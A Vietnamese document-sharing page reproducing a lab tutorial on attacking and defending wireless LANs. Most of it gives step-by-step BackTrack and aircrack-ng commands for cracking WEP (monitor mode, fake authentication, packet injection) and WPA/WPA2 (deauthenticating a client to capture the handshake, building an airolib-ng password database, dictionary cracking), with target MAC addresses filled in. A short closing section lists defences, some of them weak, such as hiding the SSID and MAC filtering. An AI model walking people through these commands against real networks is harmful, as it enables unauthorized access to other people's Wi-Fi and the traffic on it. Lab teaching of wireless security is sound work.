Cách tấn công và phòng thủ mạng Wireless LAN
lượt xem 324
download
Chuẩn bị: Đầu tiên máy phải kết nối mạng theo mô hình trên, ta cần một máy tính có gắn card wireless được backtrack hỗ trợ để hack, và cuối cùng ta sử dụng disc hoặc usb có chứa phần mềm backtrack 4 Final
Bình luận(1) Đăng nhập để gửi bình luận!
Nội dung Text: Cách tấn công và phòng thủ mạng Wireless LAN
- CÁCH TẤN CÔNG VÀ PHÒNG THỦ MẠNG WIRELESS LAN MÔ HÌNH: TẤN CÔNG MẠNG WIRELESS LAN SỬ DỤNG BẢO MẬT DẠNG WEP : CHUẨN BỊ : Đầu tiên các máy phải kết nối mạng theo mô hình trên Ta cần một máy tính có gắn card wireless được backtrack hỗ trợ để hack Và cuối cùng ta sử dụng một disc hoặc usb có chứa phần mềm backtrack 4 FINAL CÁC BƯỚC THỰC HIỆN: BƯỚC 1: Ta vào bios cấu hình máy tính khởi động từ disc hay usb
- BƯỚC 2: SỬ DỤNG GIAO DIỆN ĐỒ HỌA TRONG MÔI TRƯỜNG BACKTRACK 4 FINAL Từ dấu nhắc ta sử dụng lệnh Startx BƯỚC 3 : CHUYỂN CARD SANG CHẾ ĐỘ MONITOR Mở terminal (tương tự dos trong windown) và gõ lệnh IWCONFIG
- Chuyển sang chế độ monitor ta dùng lệnh : airmon-ng start wlan0 (wlan0 là tên card mạng có thể mỗi máy có tên card mạng khác như ath0)
- BƯỚC 4: TÌM ACCESS POINT (AP) PHÁT SÓNG XUNG QUANH Gõ lệnh : airodump-ng wlan0 BƯỚC 5: CHỌN AP CẦN TẤN CÔNG Mở terminal thứ 2 lên gõ lệnh : airodump-ng -w wep –c 6 –bssid 00:1B:11:58:7B:A9 wlan0
- BƯỚC 6 : HACKER GIẢ ADDRESS (WIRELESS CLIENT) ĐỂ CHỨNG THỰC VỚI AP Mở terminal thứ 3 gõ lệnh : aireplay-ng -1 0 –a 00:1B:11:58:7B:A9 wlan0 BƯỚC 7 : Gửi gói tin lên mạng để làm tăng traffic nhằm mục đích thu thập các gói tập tin nhanh hơn để giải mã tìm key Mở terminal 4 gõ lệnh : aireplay-ng -3 –b 00:1B:11:58:7B:A9 wlan0
- BƯỚC 8 :Xem traffic thu thập được bao nhiêu nếu (wep 64 bit thì từ 10000 đến 40000 thì ta đã giải mã được còn đối với wep 128bit thì có thể ta cần đến 110000 để giải mã ) ta trở lại màn hình ở bước 5 coi ở cột Data đã được bao nhiêu gói Bước 9 : TÌM KEY : Ta sử dụng lệnh aircrack-ng wep-01.cap wlan0
- Đây là hình ảnh key mà ta tìm được TẤN CÔNG MẠNG WLAN SỬ DUNG DẠNG BẢO MẬT WPA
- YÊU CẦU: vĐể crack được wpa thì yêu cầu phải có môi trường cơ sở dữ liệu SQLite. Ta có thể download SQLite tại http://www.sqlite.org/sqlite-3.5.7.tar.gz . vMột list chứa các password, list này phải đảm bảo có chứa khoá của mạng mà ta cần hack vMột list chứa các ssid, list này phải đảm bảo có chứa ssid của AP target. Bài lab này sẽ tiến hành crack các loại khoá là WPA PERSONAL TKIP, WPA PERSONAL AES, WPA2 AES và WPA2 TKIP+AES. CÁC BƯỚC TIẾN HÀNH CRACK: vCÀI ĐẶT SQLite như sau: tar xvzf /root/Desktop/sqlite/sqlite-3.5.7.tar.gz cd sqlite-3.5.7 ./configure --prefix=/usr/local Make CRACK WPA TKIP: ·Chuyển card wireless về monitor mode như hình sau: • Dò tìm kênh và MAC address của AP target và client target bằng lệnh airodump-ng ath0 , kết quả dò tìm như hình sau :
- Tiến hành bắt gói trên kênh và MAC address của AP target vừa tìm được bằng lệnh: airodump-ng –c 1 –w/root/desktop/capture/wpa –bssid 00:14:bf:05: d6:0c ath0 Tiếp theo, ta dùng tool aireplay và MAC address của client target để tạo ra 4 bước bắt tay với AP target : Aireplay-ng -0 1 –a 00:14:bf:05: d6:0c –c 00:16:b6:99:74:78 ath0
- Quay lại màn hình bắt gói airodump quan sát ta thấy quá trình bắt tay đã diễn ra như hình sau: Thế là ta đã capture được 4 bước bắt tay với AP target. • Dùng tool airolib-ng để tạo cơ sở dữ liệu cho quá trình crack bằng lệnh airolib-ng vnpro_gtvt_hcm init với vnpro_gtvt_hcm là tên của cơ sở dữ liệu được chứa mặc định trong home folder. Sau đó, ta import các list password và list ssid vào cơ sỡ dữ liệu vnpro_gtvt_hcm như sau: Airolib-ng vnpro_gtvt_hcm import ascii essid dictionary.txt /* với dictionary.txt là list chứa tên các ssid */
- Airolib-ng vnpro_gtvt_hcm import ascii passwd password.lst /* với password.lst là file chứa các password */ Ta kết hợp các ssid với password với nhau sau khi import thành công list password và list ssid bằng lệnh: Airolib-ng vnpro_gtvt_hcm batch kiểm tra lại số ssid và password hợp lệ mà ta có bằng lệnh sau: Airolib-ng vnpro_gtvt_hcm stats
- mở một shell mới chạy tool aircrack-ng để tìm khoá : aircrack-ng –r vnpro_gtvt_hcm /root/desktop/capture/wpa*.cap Sau khi lệnh thực hiện xong, ta thu được key
- Quá trình crack khoá WPA AES, WPA2 AES và WPA2 TKIP+AES bao gồm các bước thực hiện hoàn toàn như vi ệc crack WPA TKIP. Tiếp theo, ta chỉ kiểm tra quá trình tìm ra khoá của các loại khoá trên CRACK WAP AES Khoá tìm được :
- CRACK WPA2 AES
- CRACK WPA2 TKIP+AES Chạy lệnh tool aircrack để tìm key Tìm được key là vnprogtvthcmtkipvaaes (vnpro gtvt hcm tkip và aes)
- CÁC BƯỚC PHÒNG THỦ Password phức tạp P@ssw0rd (ít nhất là 10 ký tự trở lên, gồm o 4 thành phần) Bảo mât wlan bằng IP Address chúng ta không cho accesspoint o cấp địa chỉ IP động (disable DHCP) cho các wireless client hay dùng kỹ thuật phân chia mạng con (supnetting) để cấp số lượng IP cho phù hợp với số lượng wireless clietn phù hợp trong mạng ẩn SSID (DISABLE BROADCAST) o Lọc MAC ADDRESS : Sử dụng tính năng lọc MAC address để o cho phép hoặc không cho phép 1 số wireless client truy cập vào hệ thống mạng Nêu truy cập vào access point thường xuyên để xem có kẻ lạ o mặt vào hay khôngnếu phát hiện đổi pass ngay lập tức hoặc chúng ta sẽ xây dựng hệ thống Radius nhằm mã hoá o sóng wireless cao cấp hơn (wpa2 radius)
CÓ THỂ BẠN MUỐN DOWNLOAD
-
KỸ THUẬT TẤN CÔNG VÀ PHÒNG THỦ TRÊN KHÔNG GIAN MẠNG - Kỹ thuật tấn công - Session Hijacking
41 p | 588 | 209
-
KỸ THUẬT TẤN CÔNG VÀ PHÒNG THỦ TRÊN KHÔNG GIAN MẠN - Kỹ thuật tấn công mạng - Google Hacking
23 p | 402 | 188
-
KỸ THUẬT TẤN CÔNG VÀ PHÒNG THỦ TRÊN KHÔNG GIAN MẠNG- Kỹ thuật tấn công - Social Engineering
49 p | 380 | 181
-
KỸ THUẬT TẤN CÔNG VÀ PHÒNG THỦ TRÊN KHÔNG GIAN MẠNG - Kỹ thuật tấn công - Denial of Service
32 p | 376 | 180
-
KỸ THUẬT TẤN CÔNG VÀ PHÒNG THỦ TRÊN KHÔNG GIAN MẠN - Kỹ thuật tấn công mạng - Footprinting và Reconnaissance
46 p | 420 | 174
-
Thực hành: Kỹ thuật tấn công và phồng thủ tren không gian mạng
27 p | 369 | 161
-
Sổ tay Tấn công và Phòng thủ ứng dụng WEB
55 p | 316 | 159
-
Các kiểu tấn công firewall và cách phòng chống
32 p | 318 | 135
-
Tấn công ARP spoofing trong mạng LAN và cách phòng chống
0 p | 522 | 83
-
Khắc phục sự cố khi máy vi tính bị tấn công và hướng dẫn cách phòng thủ: Phần 1
181 p | 73 | 13
-
Khắc phục sự cố khi máy vi tính bị tấn công và hướng dẫn cách phòng thủ: Phần 2
99 p | 80 | 9
-
Phương pháp bảo vệ và khác phục sự cố máy tính: Phần 1
181 p | 36 | 9
-
Phương pháp bảo vệ và khác phục sự cố máy tính: Phần 2
99 p | 51 | 8
-
Vạn vật kết nối internet IoT – những vụ tấn công tiêu biểu và biện pháp phòng chống
9 p | 49 | 8
-
Bài giảng Kỹ thuật tấn công và phòng thủ trên không gian mạng - Module 09: Session Hijacking
41 p | 39 | 8
-
Nghiên cứu thủ thuật khắc phục máy tính khi bị vi rút tấn công: Phần 1
47 p | 29 | 8
-
Giải pháp phát hiện tấn công DDoS trong mạng định nghĩa mềm
9 p | 7 | 3
Chịu trách nhiệm nội dung:
Nguyễn Công Hà - Giám đốc Công ty TNHH TÀI LIỆU TRỰC TUYẾN VI NA
LIÊN HỆ
Địa chỉ: P402, 54A Nơ Trang Long, Phường 14, Q.Bình Thạnh, TP.HCM
Hotline: 093 303 0098
Email: support@tailieu.vn